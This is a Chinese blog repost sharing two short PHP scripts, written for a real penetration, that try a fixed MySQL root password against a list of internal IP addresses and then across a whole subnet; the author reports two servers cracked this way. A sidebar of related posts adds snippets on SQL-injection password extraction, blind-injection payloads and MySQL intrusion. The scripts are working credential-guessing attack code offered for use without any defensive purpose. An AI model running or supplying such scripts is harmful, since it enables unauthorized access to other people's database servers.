放个简单的MYSQL服务器猜密码脚本 - 4ngel's blog -京华志

最新推荐文章于 2021-01-27 02:18:58 发布
最新推荐文章于 2021-01-27 02:18:58 发布
阅读量1.3k 收藏
点赞数
文章标签: mysql 脚本 服务器 blog asp.net web

昨日渗透时 , 整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。

这个是已知开了3306的。。

<?php$hostdb = array('192.168.168.10','192.168.168.20','192.168.168.20','192.168.168.40','192.168.168.50','192.168.168.60','192.168.168.70','192.168.168.80','192.168.168.90','192.168.168.100');$dbu = 'root';$dbp = '1qaz2wsx';foreach ($hostdb as $host) {if(@mysql_connect($host, $dbu, $dbp)) {echo $host.' - '.$dbu.' - '.$dbp.' ... OK<br>';}}echo 'done.';?>

举一反三,这是全段猜的。

<?php$ips = '192.168.168.';$dbu = 'root';$dbp = '1qaz2wsx';for ($i=1; $i<254; $i++) {if(@mysql_connect($ips.$i, $dbu, $dbp)) {echo $ips.$i.' - '.$dbu.' - '.$dbp.' ... OK<br>';}}echo 'done.';?>
 
本文来源于:凯里黑客http://www.0855.tv ,转载请注明来处,谢谢! 
www.jinghuazhi.com 整理 最新热门ASP.NET教程 最新ASP.NET C#咨询 最热门的技术讨论 尽在京华志
qq9361235
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
修改配置fckeditor
cnruhua的专栏
01-16 104
    由于从网上下载的fckeditor过大并且也不适于自己的需要,而4ngel提供的精简版( http://www.sablog.net/blog/?action=show&amp;id=379 )又去掉了一些我所需要的功能(比如图片上传),于是萌生了自己修改的想法。说干就干,步骤记录 如下:首先从官方网站上下载fckeditor2.6,地址: http://www.fcked...
一个“网页加载中”的特效代码 - 4ngel's blog - Powered by Sablog-X
10-04
一个“网页加载中”的特效代码 - 4ngel's blog - Powered by Sablog-X 京华出品 必数精华
mysql alter 操作 - 4ngel's blog
10-06
mysql alter 操作 - 4ngel's blog
Discuz开源论坛.NET版
09-11
Discuz开源论坛.NET版 非常不错的
SaForums v 1.0 Beta Build 0916 discuz修改版
12-27
著名论坛安全组织www.4ngel.net修改的,去掉了很多无用的功能,以安全,速度为第一需要,站长强烈推荐此版本。<br> <br> 由于删除太多字段和数据表,所以不打算改写自动安装文件了,大家把discuz.sql文件导入数据库,<br> 配置好config.php文件里的相关信息,再把./templates, ./attachments, ./forumdata, <br> ./forumdata/cache, ./forumdata/templates 五个目录属性改为777,就安装完毕了。<br> <br> 默认用户名和密码都是admin<br> <br> 这个是基于Discuz 2.2F修改的,由于之前修补了不少官方的漏洞。所以discuz并不是最新的版本,<br> 虽然不敢说绝对安全,但是相对官方发布的,绝对要安全得多,如果懂php的,可以下载来看。希<br> 望找出问题的,能告诉小弟一声。<br> <br> 去掉了发帖表情、图标、评分功能,用户资料去掉了性别、积分、来自什么地方、Yahoo Messages、 用户头像、头衔、还有等级的星星,帖子也去掉了图标、积分相关的,用户组的积分、上传等相关 设置、论坛公告等……、 删除大量字段、数据表仅留20个,去掉了99%的图片,精简了整个论坛模板。 改写了大概30%的代码,版权还留着discuz的信息。 由于是修改作品,所以并不能算是本站的项目,只是angel本人的一个修改作品。如果大家使用没有 什么问题,11月就发布最终修改版,然后停止开发。喜欢就拿去吧。因为是开源代码,所以本站不会 提供太多的技术支持。 不多说了,有什么问题到测试论坛反馈。
网页颜色对照表 - 4ngel's blog -京华
10-04
#### 标题:“网页颜色对照表 - 4ngel's blog -京华” 该标题清晰地表明了文章的主题是关于网页颜色对照表,并且来源于4ngel's blog,这表明文章可能还包含了作者个人的观点或经验分享。 #### 描述:“京华...
收集一些颜色代码 - 4ngel's blog - 京华
10-04
根据给定文件的信息,我们可以提炼出以下几个主要的知识点: ### 1. 颜色代码的基本概念 颜色代码是用于表示特定颜色的数值或字符序列,在网页设计、UI设计及编程语言(如ASP.NET)中广泛应用。颜色代码可以帮助...
数据库查询工具 - Aqua Data Studio - 4ngel's blog 京华
10-04
- **MySQL**(5.x, 4.x, 3.x) - **Apache Derby**(10.x) - **通用 JDBC 平台** - **通用 ODBC** 如此广泛的支持意味着 Aqua Data Studio 可以成为几乎所有数据库开发者的首选工具。 #### 六、结语 Aqua Data ...
淘宝API图片尺寸的缩略图解决办法
mal327的专栏
11-27 3879
淘宝API图片尺寸的缩略图解决办法 (本文出自4ngel's blog,转载时请注明出处) 淘宝Open API返回的图片pic_url,尺寸一般都很大,不太好用,需要缩略图。 解决方法是:pic_url的图片URL后面加上:_sum.jpg 例如:1234.jpg 改为1234.jpg_sum.jpg 可参考:wap.taobao.com 还有其他的几种大小格式: _4
详解MYSQL数据库密码的加密方式及破解方法(1)
理性的幻想
05-31 9683
转自 http://hi.baidu.com/davice_li/blog/item/5f5b470be3307e32b0351db5.html MYSQL数据库用户密码跟其它数据库用户密码一样,在应用系统代码中都是以明文出现的,在获取文件读取权限后即可直接从数据库连接文件中读取,例如asp代码中的conn.asp数据库连接文件,在该文件中一般都包含有数据库类型,物理位置,用户名和密码等信息
2018最新MySQL破解密码的方法
云深海阔专栏
06-19 1万+
一、修改配置文件,在mysqld下添加skip-grant-tables 二、重启MySQL使配置生效 三、免密码登陆 1、登陆试用多种方法修改密码都报错,所以常用破解密码不适用 2、试用新的方法修改密码如下操作(记得刷新) 四、改回my.cnf文件以及重启MySQL服务 至此MySQL密码破解完毕 ...
MySQL5.7的密码破解
静水流深
01-21 4036
mysql启动时跳过授权表,使用无密码登陆,在这个会话中再把授权表加载进来,把密码修改之后重启即可。 1.关闭MySQL数据库 [root@localhost ~]# systemctl stop mysqld  Redirecting to /bin/systemctl stop  mysqld.service [root@localhost ~]# mysqld --help [ro
Metasploit渗透测试实验报告
热门推荐
ling_xiao007的专栏
02-21 1万+
《Metasploit渗透测试魔鬼训练营》一书采用独特的让读者成为虚拟渗透测试的主角的方式,经历一次对DVSSC公司网络的渗透测试任务。渗透测试的目标为DVSSC公司DMZ网段以及内网客户端主机。四个主机均存在严重漏洞缺陷,可执行不同方式的攻击方式。 信息搜集阶段获得了dvscc的域名注册信息、地理位置,以及DMZ网段操作系统版本、开放端口及其服务版本等信息,但域名注册信息存有疑问。 漏洞扫描阶段获得DMZ网段主机大量漏洞信息,可采取不同方式的攻击方式,如口令测、网络服务渗透攻击、浏览器渗
SQL Injection with MySQL
11-11 1439
本文作者:angel文章性质:原创发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advanced SQL Injection with MySQL》之前一个月。声明  本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有
教你一些MySQL数据库入侵及防御方法(有书送)
weixin_40581617的博客
06-08 5432
在针对网站渗透中,很多都是跟 MySQL 数据库有关,各种 MySQL 注入、MySQL 提权、MySQL 数据库 Root 账号 webshell 获取等,但没有一个对 MySQL 数据库渗透较为全面的总结。针对这种情况我们开展了研究,但技术的进步永无止境,思想有多远,路就可以走多远,在研究 MySQL 数据库安全之余,我们也对 MySQL 如何通过 msf、sqlmap 等来进行扫描、漏洞利用...
mysql 攻击密码_防止mysql用户root密码弱口令的攻击方法
weixin_39657300的博客
01-19 110
1、连接到对方MYSQL 服务器mysql -u root -h 192.168.0.1mysql.exe 这个程序在你安装了MYSQL的的BIN目录中。2、让我们来看看服务器中有些什么数据库mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。3、让我们进入数据库mysql>use te...
一段代码,SQL注入解数据库用户密码
weixin_33940102的博客
02-19 236
&lt;?PHP set_time_limit(0); $base = "网址"; $arr1 = range('A','G'); $arr2 = range(0,9); $arr = array_merge($arr1,$arr2); $arr[] = '*'; $ch = curl_init(); for(...
盲注 mysql 密码_Mysql盲注技巧
weixin_29928877的博客
01-27 197
废话少说,直接上代码一、order by 的参数注入技巧:两种方法,思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法:1.[SQL] select username,password from uc_members order by 1,If((select 1)=...
PHP防注入
ly8199的专栏
03-06 433
在现在各种黑客横行的时候,如何实现自己php代码安全,保证程序和服务器的安全是一个很重要的问题,我随便看了下关于php安全的资料,并不是很多,至少比asp少多了,呵呵,于是就想写点东西,来防止这些可能出现的情况。这里没有太深的技术含量,我只是比较简单的谈了谈。(以下操作如无具体说明,都是基于PHP+MySQL+Apache的情况)     先来说说安全问题,我们首先看一下两篇文章:http:/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值